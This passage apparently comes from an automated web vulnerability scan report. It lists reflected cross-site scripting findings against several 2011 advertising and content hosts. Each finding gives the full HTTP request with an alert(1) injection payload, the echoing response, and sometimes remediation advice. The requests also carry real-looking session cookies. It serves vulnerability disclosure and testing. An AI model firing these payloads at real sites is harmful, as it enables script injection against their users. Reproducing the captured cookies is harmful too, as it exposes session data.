User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:33:19 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 3980

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
overlay(te_clr1_att02cont1_bi)','icon':'http://choices.truste.com/assets/admarker.png','icon_cam':'http://choices.truste.com/assets/adicon.png','iconText':'','aid':'att02','pid':'mec01','zindex':'100025710e<script>alert(1)</script>ce869b4fe74','cam':'2'};

   var tecabaseurl = 'choices.truste.com';

   truste.ca.addEvent(window, 'load', function() {
       if(!truste.defjsload) {
           var element = document.createElement('script');
           element.src = '
...[SNIP]...

2.94. http://cm.npc-scripps.overture.com/js_1_0/ [css_url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cm.npc-scripps.overture.com
Path:   /js_1_0/

Issue detail

The value of the css_url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8330"><script>alert(1)</script>c20de1645a8 was submitted in the css_url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js_1_0/?config=7894763060&type=entertainment&ctxtId=entertainment&keywordCharEnc=utf8&source=npc_scripps_courierpress_t1_ctxt&adwd=728&adht=90&ctxtUrl=http%3A%2F%2Fwww.courierpress.com%2Fnews%2F2011%2Fmay%2F12%2Fheder-here-in-this-spp-ppppp%2F&css_url=http://media.scrippsnewspapers.com/yahoo/yahoo_cm.cssb8330"><script>alert(1)</script>c20de1645a8&du=1&cb=1305207046691&ctxtContent=%3C!--%0A%20%20%0A%20%20%20%20%0A%20%20%20%20ROLE%20%3D%20prod.%0A--%3E%3Chead%3E%0A%09%0A%09%09%0A%09%09%3Cscript%20type%3D%22text%2Fjavascript%22%3E%0A%09%09%09var%20jSINGconf%20%3D%20%7B%7D%3B%0A%09%09%09jSINGconf.theme%20%3D%20%7B%0A%09%09%09%09%0A%09%09%09%09%09CITY%3A%20'Evansville'%2C%0A%09%09%09%09%0A%09%09%09%09%09SITE_NAME%3A%20'Evansville%20Courier%20%26%20Press'%2C%0A%09%09%09%09%0A%09%09%09%09%09VIDEO_MEDIA_URL%3A%20'http%3A%2F%2Fmedia.scrippsnewspapers.com%2Fcorp_assets%2Fasphalt'%2C%0A%09%09%09%09%0A%09%09%09%09%09SITE_MEDIA_URL%3A%20'http%3A%2F%2Fweb.courierpress.com%2Fstatic%2Fecp%2Fasphalt%2Fprod'%2C%0A%09%09%09%09%0A%09%09%09%09%09REGION%3A%20'Evansville'%2C%0A%09%09%09%09%0A%09%09%09%09%09MOBILE_SITE_NAME%3A%20'Evansville%20Courier%20%26%20Press%20Mobile'%2C%0A%09%09%09%09%0A%09%09%09%09%09SITE_URL%3A%20'http%3A%2F%2Fwww HTTP/1.1
Host: cm.npc-scripps.overture.com
Proxy-Connection: keep-alive
Referer: http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=76of9et6r747t&b=3&s=m1; UserData=02u3hs9yoaLQsFTjBpdnM0tDCyNTUycXAzcLJTNk%2bLSi4sTU1JNbEBACNDFzcLUwNnC2MAc2BU%2bQw=

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:10 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: UserData=02u3hs9yoaLQsFTjBpdnM0tDCyNTUycXAzcLJTNk%2bLSi4sTU1JNbEBACNDVzczExMLS3MAN0tUBA0=; Domain=.overture.com; Path=/; Max-Age=315360000; Expires=Sun, 09-May-2021 13:32:10 GMT
Cache-Control: no-cache, private
Pragma: no-cache
Expires: 0
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 4470


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<base target="_top">
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<link rel="stylesheet" href="http://media.scrippsnewspapers.com/yahoo/yahoo_cm.cssb8330"><script>alert(1)</script>c20de1645a8" type="text/css">
...[SNIP]...

2.95. http://guidepolls.about.com/urbanlegends/8140502316/poll.js [linkback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://guidepolls.about.com
Path:   /urbanlegends/8140502316/poll.js

Issue detail

The value of the linkback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6e7d1'%3balert(1)//b1ec805f36c was submitted in the linkback parameter. This input was echoed as 6e7d1';alert(1)//b1ec805f36c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /urbanlegends/8140502316/poll.js?linkback=http://urbanlegends.about.com/b/2011/05/10/poll-superstitious-about-friday-the-13th.htm6e7d1'%3balert(1)//b1ec805f36c HTTP/1.1
Host: guidepolls.about.com
Proxy-Connection: keep-alive
Referer: http://urbanlegends.about.com/b/2011/05/10/poll-superstitious-about-friday-the-13th.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TMog=B5312m3f20kA052n; zFD=B5310B50110B00101; jsc=13; Mint=B5CDUi2520kA1h03; zBT=1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:24 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.25_01 ARM/06TD.34
PRAGMA: no-cache
Cache-Control: max-age=-3600
Expires: Thu, 12 May 2011 12:32:24 GMT
Content-Type: application/x-javascript
Content-Length: 907

var x = '<div class="poll"> <h4>Are you superstitious about Friday the 13th?</h4> <form method="get" action="/gi/pages/poll.htm"> <input type="hidden" name="linkback" value="http://urbanlegends.about.com/b/2011/05/10/poll-superstitious-about-friday-the-13th.htm6e7d1';alert(1)//b1ec805f36c">
...[SNIP]...

2.96. http://hits.nextstat.com/cgi-bin/wsv2.cgi [108645 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hits.nextstat.com
Path:   /cgi-bin/wsv2.cgi

Issue detail

The value of the 108645 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8db3"-alert(1)-"d35a77103d0 was submitted in the 108645 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cgi-bin/wsv2.cgi?108645d8db3"-alert(1)-"d35a77103d0 HTTP/1.1
Host: hits.nextstat.com
Proxy-Connection: keep-alive
Referer: http://orangeorb.blogspot.com/2011/05/planets-align-on-friday-13th-and.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:27 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Cache-Control: private
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: webStat_108645d8db3"-alert(1)-"d35a77103d0=2b45ebce6d4c259189182ba86a7560e8; expires=Sun, 09-May-2021 13:32:27 GMT; path=/; domain=.nextstat.com
Set-Cookie: webStat_108645d8db3"-alert(1)-"d35a77103d0_mv=2b45ebce6d4c259189182ba86a7560e8; expires=Sun, 09-May-2021 13:32:27 GMT; path=/; domain=.nextstat.com
Content-Length: 4124
Connection: close
Content-Type: text/html; charset=UTF-8

function wf_get_rfsqv() {
var q = (WS_rfs_3p && WS_ref.indexOf('?') > 0)?WS_ref.substring(WS_ref.indexOf('?')+1):WS_rfs.location.search.substring(1),v = q.split("&");
for (var i=0;i<v.length;i++)
...[SNIP]...
}
return true;
}
function wf_rfs_get() { if (! WS_rfs) { WS_rfs = WS_w; WS_rfs = wf_rfs_main (WS_rfs); } return WS_rfs; }
function wf_evt_trk(et){var i=new Image();i.src=et;}

var WS_ac="108645d8db3"-alert(1)-"d35a77103d0";
var WS_w=window, WS_d=document, WS_rfs = 0, WS_rfs_3p = 0, WS_ref = WS_d.referrer;

var WS_aref;
var WS_pn;
var WS_pnj = "";
var WS_Cam, WS_Evt;
if (WS_pn) WS_pn = escape(WS_pn);
else if (WS_pnj) WS
...[SNIP]...

2.97. http://ib.adnxs.com/ptj [redir parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The value of the redir request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ab71b'%3balert(1)//4d87f937d49 was submitted in the redir parameter. This input was echoed as ab71b';alert(1)//4d87f937d49 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ptj?member=541&size=300x250&inv_code=1588565&referrer=http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dad%26ad_size%3D300x250%26section%3D1588565ab71b'%3balert(1)//4d87f937d49 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://adserving2.cpxinteractive.com/st?ad_type=iframe&ad_size=300x250&section=1588565
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIn4MBEAoYAiACKAIwsMeq7gQKEgibiwEQChgDIAMoAzDcyKruBAoSCN--AhAKGAEgASgBMOHequ4EEOHequ4EGBQ.; anj=Kfw)(H.Ook)_c8%r9ff]S@h8KANc]mP0h#i:1kZfDLeOJ8#%:'=tMdp)hT=FiVaam_7'jPTW.C%.HxVrFU+@):Ol/][9rD6QF]:$2o$=2t6Ekuw9KB7t>8oBvD:k99t)AUvBQXpMrB.WZ5q$]?qZQ<Vu[#-5^T/x)S7Oq?h<uC6Z'cFlMBT^$(tZTqQER-Qb:5W?g#97-6xWK*4C*9Y>i-@J(yrw^Ur004(6av#+:`V.$%Pg]1DL-tn5$I':[WH#s(nOG69jVj#uUqQEFm_f3-WbrQnxP_drdf#rnuCaB*1I[+NvK[h(c^5Cfj.]G5(':2LiI%%e8#U`X)iJ[4k+(rXIJhdni<)gQjgMUOcN^MOw573KS9ffE$yoAk:>vBb/x@'DVx72K/G/TF_NOLJt[Iy>s!G$dq2Xo:NAZ$7JjL5hQ1Wl:w0(Oa@MM`A:J5wBQuG9jejGeOsVqM1%Tv8OvW0d`NSP4F`8%4q]@s=N3tj7_2rE.]F]824R1O]-r7%W#2%YUAe0vv=@J-XlNPR`5^cw-2hGuDpvfqe=s6vBS!qVDC)at^+-@uA6Zcf)LUf'Vu<UUwffAv@PD(x%bOXCT7ce=h0.JV^-rud6M/nMD2uDe+h%f9jmNXTMyW!I=tuJLUZJ#YJ4>1u!>#NuZ#?6t96[:wU5#1KSrBf*SZTK8<Ta<L772@gT_5e9PMtHS(PR0#:aQJ9n`5j; sess=1; uuid2=2724386019227846218

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 13-May-2011 13:33:12 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Wed, 10-Aug-2011 13:33:12 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Wed, 10-Aug-2011 13:33:12 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChII-ooBEAoYASABKAEwmMOv7gQQmMOv7gQYAA..; path=/; expires=Wed, 10-Aug-2011 13:33:12 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb949612=-@L6D208WMq5cpg20/dRjHaWJ?enc=PDw8PDw8DEAAAAAAAAAIQAAAAAAAAAhAYhBYObQIEUAK16NwPQoUQIPTcXV8EH5bSsYda6b2ziWY4ctNAAAAABRWAwAdAgAA4gEAAAIAAAAPCAQAksAAAAEAAABVU0QAVVNEACwB-gAkAwAAlBABAgUCAAUAAAAA9Rdv9wAAAAA.&tt_code=1588565&udj=uf%28%27a%27%2C+12656%2C+1305207192%29%3Buf%28%27c%27%2C+60150%2C+1305207192%29%3Buf%28%27r%27%2C+264207%2C+1305207192%29%3B&cnd=!SRusDwj21QMQj5AQGAAgkoEDMAA4pAZAAEjiA1CUrA1YAGDaAWgAcAB4AIABFogB5hWQAQGYAQGgAQOoAQOwAQG5AQrXo3A9ChRAwQEK16NwPQoUQMkBMzMzMzMz9z_QAQA.&ccd=!ZARnJwj21QMQj5AQGJKBAyAA; path=/; expires=Fri, 13-May-2011 13:33:12 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Wed, 10-Aug-2011 13:33:12 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)(Hg0)m)_Uh2u:[r@PdBuy]S=FdXg)Ov(hO!$dY(koMBFV9m*6?J@gS%S=?Gc6U#?^ITW.C%.HqtOE7nUz/H)+lj:jQe>d]P0JIz6scC@6!d^_JDL4(Eqn@KB?p+IxXVz5l@7Qi.hvK2fXWC#z.Yve]0:@BovHT9i=Y6*`[@LEqZ4a_oFLsJ<T2#7YqwU:X?m8t!O'_[X`Em/W+C?b_[^-Hx_81HGl6h7e_55C!4`6(QHuL*7*hlVs@B8ctXnwcD41w%TF7tcaN'7gZRdos7`wWAw9W-/ha4br%YE`t(l[/BJwTSaS-Nc$C/A^$uCbte)*hR*amnJS-cCjw3iTW/B=7Q2<r31W:r>.KSS4M$.yv.GqtpO[l>P]h*gT8<W#j9g0LMgA6.-4#4od>anYU0Wc@oKg0/KerE_.4wFT5'v'CW/OPy(fr>m7SgdTLkIyRODhZB3z%P+OOlsW7dd*7qUVrjq-92umvYr#K3b?)VOKosPd+%D)jULIwnE@[^9b3Cl()!Qw4.XR-[318NFl+`e[!Ky_NNk5-hr9S^JfE-gj1.#r!>v/lWxG'1N+lNL5nZyr!ks@v2c(!cJBEI>62Gw1*pL.k/6UF4vEX.85uk2hUy7c/Jq<`Lk(BKmr99HS5dP1q_rJ7n?ZTTpx%5Xu^KG7qKbG[w'F@'iqnKm0B!8R)Z]LhY<SIqwwOVGrk[Yo; path=/; expires=Wed, 10-Aug-2011 13:33:12 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Thu, 12 May 2011 13:33:12 GMT
Content-Length: 296

document.write('<scr'+'ipt type="text/javascript"src="http://ad.yieldmanager.com/st?anmember=541&anprice=300&ad_type=ad&ad_size=300x250&section=1588565ab71b';alert(1)//4d87f937d49"></scr'+'ipt>');docu
...[SNIP]...

2.98. http://image3.pubmatic.com/AdServer/UPug [pageURL parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://image3.pubmatic.com
Path:   /AdServer/UPug

Issue detail

The value of the pageURL request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2e56f'-alert(1)-'49e155643b was submitted in the pageURL parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AdServer/UPug?operId=2&pubId=398&pixId=6&ran=0.19279520929519856&pageURL=http://www.pubmatic.com/2e56f'-alert(1)-'49e155643b HTTP/1.1
Host: image3.pubmatic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pubmatic.com/
Cookie: KRTBCOOKIE_22=488-pcv:1|uid:3658195966029417970; PUBRETARGET=82_1399045295.806_1336140548; KRTBCOOKIE_148=1699-uid:E3F32BD09546C94DAD95D1B540110C

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:34:18 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: KADUSERCOOKIE=0927D9EA-1CD0-46F5-B72D-6FC4476FCBD6; domain=pubmatic.com; expires=Fri, 11-May-2012 13:34:18 GMT; path=/
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Connection: close
Content-Type: text/html
Content-Length: 500

document.write('<script type="text/javascript" src="http://ads.pubmatic.com/UniversalPixel/398/6/pixel.js"></script>');
document.write('<iframe name="pbeacon" frameborder="0" allowtransparency="true"
...[SNIP]...
olling="no" width="0" height="0" style="position:absolute;top:-20000px;" src="http://ptrack.pubmatic.com/AdServer/PugTracker?pixId=6&pubId=398&ran=0.19279520929519856&pageURL=http://www.pubmatic.com/2e56f'-alert(1)-'49e155643b">
...[SNIP]...

2.99. http://image3.pubmatic.com/AdServer/UPug [ran parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://image3.pubmatic.com
Path:   /AdServer/UPug

Issue detail

The value of the ran request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 33c57'-alert(1)-'f87ac0b58b4 was submitted in the ran parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AdServer/UPug?operId=2&pubId=398&pixId=6&ran=0.1927952092951985633c57'-alert(1)-'f87ac0b58b4&pageURL=http://www.pubmatic.com/ HTTP/1.1
Host: image3.pubmatic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pubmatic.com/
Cookie: KRTBCOOKIE_22=488-pcv:1|uid:3658195966029417970; PUBRETARGET=82_1399045295.806_1336140548; KRTBCOOKIE_148=1699-uid:E3F32BD09546C94DAD95D1B540110C

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:34:18 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: KADUSERCOOKIE=7AFF6AED-C8A2-4BD1-85B4-05A0945C43F9; domain=pubmatic.com; expires=Fri, 11-May-2012 13:34:18 GMT; path=/
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Connection: close
Content-Type: text/html
Content-Length: 501

document.write('<script type="text/javascript" src="http://ads.pubmatic.com/UniversalPixel/398/6/pixel.js"></script>');
document.write('<iframe name="pbeacon" frameborder="0" allowtransparency="true"
...[SNIP]...
ginheight="0" marginwidth="0" scrolling="no" width="0" height="0" style="position:absolute;top:-20000px;" src="http://ptrack.pubmatic.com/AdServer/PugTracker?pixId=6&pubId=398&ran=0.1927952092951985633c57'-alert(1)-'f87ac0b58b4&pageURL=http://www.pubmatic.com/">
...[SNIP]...

2.100. http://js.revsci.net/gateway/gw.js [bpid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the bpid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8f3ae'%3balert(1)//c43dde16a24 was submitted in the bpid parameter. This input was echoed as 8f3ae';alert(1)//c43dde16a24 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gateway/gw.js?csid=G07610&bpid=S02778f3ae'%3balert(1)//c43dde16a24 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf45e&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4decfa31&2&10433,10524&4dc75824&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4decfa40&1&10009&4dc75095&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4decfa7c&0&&4dc76015&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dee240a&0&&4dc8b573&271d956a153787d6fee9112e9c6a9326; NETSEGS_J09847=bff01c00ddc153c5&J09847&0&4dee247a&0&&4dc8a2b6&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4def8d7d&5&10011,10030,10070,50085,50150&4dc8d181&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4def8f9d&1&10592&4dca02d1&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4def8fc2&0&&4dc9f632&271d956a153787d6fee9112e9c6a9326; NETSEGS_J07717=bff01c00ddc153c5&J07717&0&4df0a86e&0&&4dcb3d30&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07707=bff01c00ddc153c5&H07707&0&4df0a87c&0&&4dca5d68&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4df0b07e&0&&4dca8ab1&271d956a153787d6fee9112e9c6a9326; 
rsiPus_qbvO="MLsXrrEOpxpv55DW8tahZ2a57v4BlC60cICOgIfdHU7gwI+bhP0TqX40neBrVzd04YF7hotNL+h4vvc66tVVUjceSeakCP8FKl+7vpw/cPKd8tMu3PMCPoyxK8+ZjwDWyB3QMrpomCL0QiC5Kvy/YgnB8KTN7G9dLpnN5M3RK+PP1zwMehHWmM2JccWRv5ZmhNfQmN/YDBU94E+biCIoa0pKkv2eA2x+zJ1SCIL380rO+L9Lk2iLRCLsePDloY4CaZKvkWcnHN4spMzHQnUA9nMhOsrooPww0kmF/1pBhtUOQIGwwBNshy3r9jL9DmeVgwo+si4cw2GLg+UiObBCYgDoqFuF17tgWtie8ndkcM4/dxQZHmAVAFp6Cd4+NKEDE1ApHgzdWMCRN3mtXvTF3dagjo97ZcxX3TK0H5gNZL/tX25K+rZRwN8wPyK9oLx40INCM6m5859n+iEwb4c3uHEIWIExaGsanUSO3meucYKt8SqtiIB1ZKfcV2EWnE5l0JI9ym05H0J1D++1YxD2YWIf3FMp0ODLJXHC5LJl8HAXM9kRR0eUwpIWZ43I4Sxu/ghMwCqycSGD5P5qCz+NfB7cpFNnCm/MZxXAtHhkwlvld7DwvFMTxzkmteonO6+tWDCvSgxfKLeBCsnh7/g2pdMlW86tZQUhX+5vIkdTKTAbn/ygJRg0T3sdyAIGgf6VindVNH18jDokISc3IGyw/B24wJC4km6cNzLCqq3zgXP3vffJqf4px62L8VMyvj3CaMObL1w9lE2lhd4iKvN3GccP1FcTweH5kHDsZZBw7FHK1W7K9ytiQtKzGQRCBtx0rurYuoXmj+tBMHYIGgQGQbpACUKiwMwgO11XDJXNsqWXOeTs409iMvRAAhFR3MmxY/Ai8JtqiI6b0Q1+g1WTMqPGi0honF4/t46uL9iK78Kt/amFrG5zPGbmiPmMFkLKl9wLroTlxm+6qkNbYbThc0/QKEKH9b1zlGLxfdlc3hqznACvxpp0ybDR66WjOYSYr5GJsa1Cu2wcBHbKR1AxsYBzoLba+u6l87gczye8xuTrYhFfwlnHydy7IYalgPJBk32vZgWW2CXqypZtqnwMKkA2NoSDvvRLOZsd5s2E5nriVmz0A020hMNet6ezR0BbsbFJkikbhD25+D5hxe38KqYGvD586gb8nEzI0j5isfTJ/lkLrhbQFBZeshLI9NVhvhrxY3ujvMVlKz2TG/zsc7BVzk9fFPtT7mgROfudWRI+VvwrnXNE2vCSQzOJZeEAKPJctLVBCeeH5f0I+bMVOeVLPDBFeBnbAN+UOthqW+XB3wOga/8nLvsjoupDcwH+hneOk/D89Naxn/NKF3MEN04OWc1SJ6wrzqU6VhG4EvS+Zv+fJ8Gt98W7PtFLVLD0oQ=="; rsi_us_1000000="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"; NETSEGS_E05510=bff01c00ddc153c5&E05510&0&4df0b096&0&&4dc9f625&271d956a153787d6fee9112e9c6a9326; 
